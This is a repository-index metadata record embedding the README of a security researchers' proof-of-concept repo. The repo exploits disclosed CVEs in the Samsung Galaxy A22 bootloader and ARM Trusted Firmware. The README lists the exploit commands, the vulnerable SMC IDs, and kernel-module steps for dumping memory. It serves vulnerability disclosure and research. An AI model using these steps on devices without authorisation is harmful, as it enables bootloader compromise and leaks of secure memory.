{"id":43496630,"url":"https://github.com/quarkslab/samsung-bootchain-poc","last_synced_at":"2026-02-03T10:38:37.259Z","repository":{"id":257961432,"uuid":"848238596","full_name":"quarkslab/samsung-bootchain-poc","owner":"quarkslab","description":"PoC associated to the talk \"Attacking Samsung Galaxy A* Boot Chain\" (https://www.blackhat.com/us-24/briefings/schedule/#attacking-samsung-galaxy-a-boot-chain-and-beyond-38526)","archived":false,"fork":false,"pushed_at":"2024-09-09T08:28:28.000Z","size":18,"stargazers_count":82,"open_issues_count":1,"forks_count":8,"subscribers_count":5,"default_branch":"main","last_synced_at":"2026-01-17T09:29:01.921Z","etag":null,"topics":[],"latest_commit_sha":null,"homepage":null,"language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"apache-2.0","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/quarkslab.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null}},"created_at":"2024-08-27T11:52:37.000Z","updated_at":"2026-01-12T15:34:00.000Z","dependencies_parsed_at":"2024-10-17T05:31:51.974Z","dependency_job_id":null,"html_url":"https://github.com/quarkslab/samsung-bootchain-poc","commit_stats":null,"previous_names":["quarkslab/samsung-bootchain-poc"],"tags_count":0,"template":false,"template_full_name":null,"purl":"pkg:github/quarkslab/samsung-bootchain-poc","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/quarkslab%2Fsamsung-bootchain-poc","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/quarkslab%2Fsamsung-bootchain-poc/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/quarkslab%2Fsamsung-bootchain-poc/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/quarkslab%2Fsamsung-bootchain-poc/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/quarkslab","download_url":"https://codeload.github.com/quarkslab/samsung-bootchain-poc/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/quarkslab%2Fsamsung-bootchain-poc/sbom","scorecard":null,"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":29041866,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-02-03T10:09:22.136Z","status":"ssl_error","status_checked_at":"2026-02-03T10:09:16.814Z","response_time":96,"last_error":"SSL_connect returned=1 errno=0 peeraddr=140.82.121.6:443 state=error: unexpected eof while reading","robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":false,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":[],"created_at":"2026-02-03T10:38:36.699Z","updated_at":"2026-02-03T10:38:37.254Z","avatar_url":"https://github.com/quarkslab.png","language":"Python","funding_links":[],"categories":[],"sub_categories":[],"readme":"# Samsung Mediatek PoCs\n\nThis repository contains the exploits of 4 vulnerabilities\n- SVE-2023-2079/CVE-2024-20832 and SVE-2024-0234/CVE-2024-20865 impacting LittleKernel\n- and SVE-2023-2215/CVE-2024-20820 and CVE-2024-20021 impacting the ARM Trusted Firmware (or ATF).\n\nThe PoCs have been designed to work on a Samsung Galaxy A22 (SM-A225F/DSN), with the build number `TP1A.220624.014.A225FXXU6DWE3`.\n\nThe vulnerabilities are described in detail in our talk [\"Attacking the Samsung Galaxy A* Boot Chain\" we presented at OffensiveCon 2024](https://www.youtube.com/watch?v=WJ7wkJn7l7w). A [whitepaper](https://www.sstic.org/media/SSTIC2024/SSTIC-actes/when_vendor1_meets_vendor2_the_story_of_a_small_bu/SSTIC2024-Article-when_vendor1_meets_vendor2_the_story_of_a_small_bug_chain-rossi-bellom_neveu.pdf) is also available for a similar talk we gave at SSTIC 2024.\n\n## Code Execution in LittleKernel\n\nIn `piece_montee_reloaded/`, are present the PoCs for Little Kernel vulnerabilities\n- SVE-2023-2079/CVE-2024-20832: Heap overflow in bootloader, exploited with `heap_overflow.py`\n- SVE-2024-0234/CVE-2024-20865: Authentication bypass in bootloader, exploited with `this_is_fine.py` and `odin_sig_bypass.py`\n\nTo launch the exploit\n\n```bash\t\n$ python this_is_fine.py all . --pit pit.bin --gpt gpt.bin --boot boot.bin --up_param up_param.bin -H \u003c/path/to/heimdall\u003e\n```\n\n### Prerequisites\n\nThis exploit uses [Heimdall](https://github.com/Benjamin-Dobell/Heimdall) to communicate with Odin.\n\nThe attack to work requires the following images from the device:\n- `pit.bin`\n\n\u003e It can be retrieved with Heimdall.\n\u003e \n\u003e ```bash\n\u003e $ heimdall download-pit --output pit.bin\n\u003e ```\n\n- `gpt.bin`\n\n\u003e It can be retrieved from a rooted device with `dd`. Or with [MTKClient](https://github.com/bkerler/mtkclient).\n\u003e \n\u003e ```bash\n\u003e $ python $MTKCLIENT_DIR/mtk r gpt gpt.bin --preloader \u003cpath/to/preloader\u003e\n\u003e ```\n\n- `boot.bin`\n\n\u003e Must be patched using [Magisk](https://github.com/topjohnwu/Magisk) to get root privileges.\n\u003e \n\u003e The original image can be downloaded along with the stock firmware (https://samfw.com/firmware/SM-A225F). Or dumped with MTKClient.\n\u003e \n\u003e ```bash\n\u003e $ python $MTKCLIENT_DIR/mtk r boot boot.img --preloader \u003cpath/to/preloader\u003e\n\u003e ```\n\n- `up_param.bin`\n\n\u003e Only the original image is required. Can be also retrieved along with the stock firmware or using MTKClient.\n\u003e \n\u003e ```bash\n\u003e $ python $MTKCLIENT_DIR/mtk r up_param up_param.img --preloader \u003cpath/to/preloader\u003e\n\u003e ```\n\n### Restore the device\n\n```bash\n$ python $MTKCLIENT_DIR/mtk w boot,gpt boot.img,gpt.bin --preloader \u003cpath/to/preloader\u003e\n```\n\n## Memory Leak in ARM Trusted\n\nIn `demo_atf` directory you will find the PoC for ATF\n- SVE-2023-2215/CVE-2024-20820 Read out-of-bound in ATF\n- CVE-2024-20021 Remap physical memory in ATF\n\nWe implemented a short C program `send_smc.c` to exploit these two vulnerabilities. It will simply send\nthe two vulnerable SMCs (`0x8200022a` for the read out-of-bound, and `0xc2000526` for the mmap) to ATF.\nThe command `mmap_data` will mmap a memory region (using a physical address and size) to the same virtual\naddress and `leak_data` will leak the content of a memory region using a virtual address.\n\n**Note** that the system limits to 8 consecutive mmaps. An extra mmap or an attempt to leak an address not mmapped\nwill **surely crash** the device.\n\n### Prerequisites\n\nOnly the Kernel can send SMCs. Which is why we implemented a dummy kernel module in charge of forwarding SMCs received from userland through IOCTLs.\n\n### Build\n\n```\n$ aarch64-linux-gnu-gcc -static send_smc.c -o send_smc # Compile the binary\n$ adb push send_smc /data/local/tmp # Push it on the device\n$ adb push smc_forward.ko.fixed /data/local/tmp # Push the kernel module\n```\n\n### Usage\n\nOn the device\n\n```\n$ su\n# cd /data/local/tmp\n# insmod smc_forward.ko.fixed\n# ./send_smc mmap_data 0x7c200000 0x600000\n# ./send_smc leak_data 0x7c200000 0x600000 \u003e /data/local/tmp/dump.bin\n```\n\n# Contributors\n\n- Maxime Rossi Bellom\n- Raphael Neveu\n- Gabrielle Viala\n- Damiano Melotti","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fquarkslab%2Fsamsung-bootchain-poc","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fquarkslab%2Fsamsung-bootchain-poc","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fquarkslab%2Fsamsung-bootchain-poc/lists"}